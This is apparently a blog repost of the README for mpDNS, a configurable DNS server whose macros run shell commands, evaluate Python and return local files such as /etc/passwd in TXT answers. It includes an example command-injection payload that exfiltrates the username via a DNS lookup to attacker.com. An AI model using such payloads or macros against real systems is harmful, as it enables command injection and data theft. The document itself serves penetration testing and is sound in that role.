mpDNS aka multi-purpose DNS server is a simple, configurable “clone & run” DNS server with multiple useful features.
{{shellexec::dig google.com +short}} -> Execute shell command and respond with result{{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code{{file::/etc/passwd}} -> Respond with localfile contents{{resolve}} -> Forward DNS request to local system DNS{{resolve::example.com}} -> Resolve example.com instead of original record{{echo}} -> Response back with peer address{{shellexec::echo %PEER% %QUERY%}} -> Use of variablesA, CNAME, TXTnames.db records without restart/reload with ./mpdns.py -eHeavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
Usage: ./mpdns.py
./mpdns.py -e no restart requiredOffensive and Defensive purposes
/ping.php?ip=$(dig $(whoami).attacker.com))TXT querygit clone https://github.com/nopernik/mpDNS
TXT records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200bTXT record with macro {{file:localfile.txt}} is limited to 65200 bytes.test.*.example.com{{resolve::example.com}} macroTTL always set to 0Also Read – Http Request Smuggler : Extension For Burp Suite
names.db example:
>>Empty configuration will result in empty but valid responses
>>Unicode domain names are not supported but still can be catched by the server.
>> For example мама-сервер-unicode.google.com will be catched but with SERVFAIL response
passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
notgoogle.com A {{resolve::google.com}}
Example output with names.db example:
Regular resolution from DB: dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8
mpDNS output: – Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)
Recursive CNAME resolution: dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com. IN A
;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14
mpDNS output:
>> Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)
Wildcard resolution: dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1
mpDNS output: – Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)
Wildcard subdomain resolution: dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7
mpDNS output: – Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)
Forward request macro: dig google.com @localhost
;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)
Forward request of custom domain macro: dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)
File contents macro via TXT query: dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com. 0 IN TXT “root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:……stripped”
mpDNS output: – Request from 127.0.0.1:38805 -> passwd.example.com. -> ‘root:x:0:0:root…(2808)’
Custom python code macro via TXT query: dig txt eval @localhost
;; ANSWER SECTION:
eval. 0 IN TXT “320”
mpDNS output: – Request from 127.0.0.1:33821 -> eval. -> ‘320’
Shell command macro via TXT query: dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec. 0 IN TXT “root”
mpDNS output: – Request from 127.0.0.1:50262 -> shellexec. -> ‘root’
Managing files efficiently is a core skill for anyone working in Linux, whether you're a…
Open ports act as communication endpoints between your Linux system and the outside world. Every…
Introduction In today’s cyber threat landscape, protecting endpoints such as computers, smartphones, and tablets from…
Introduction In today's fast-paced cybersecurity landscape, incident response is critical to protecting businesses from cyberattacks.…
Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…
Image credit:pexels.com If you think back to the early days of personal computing, you probably…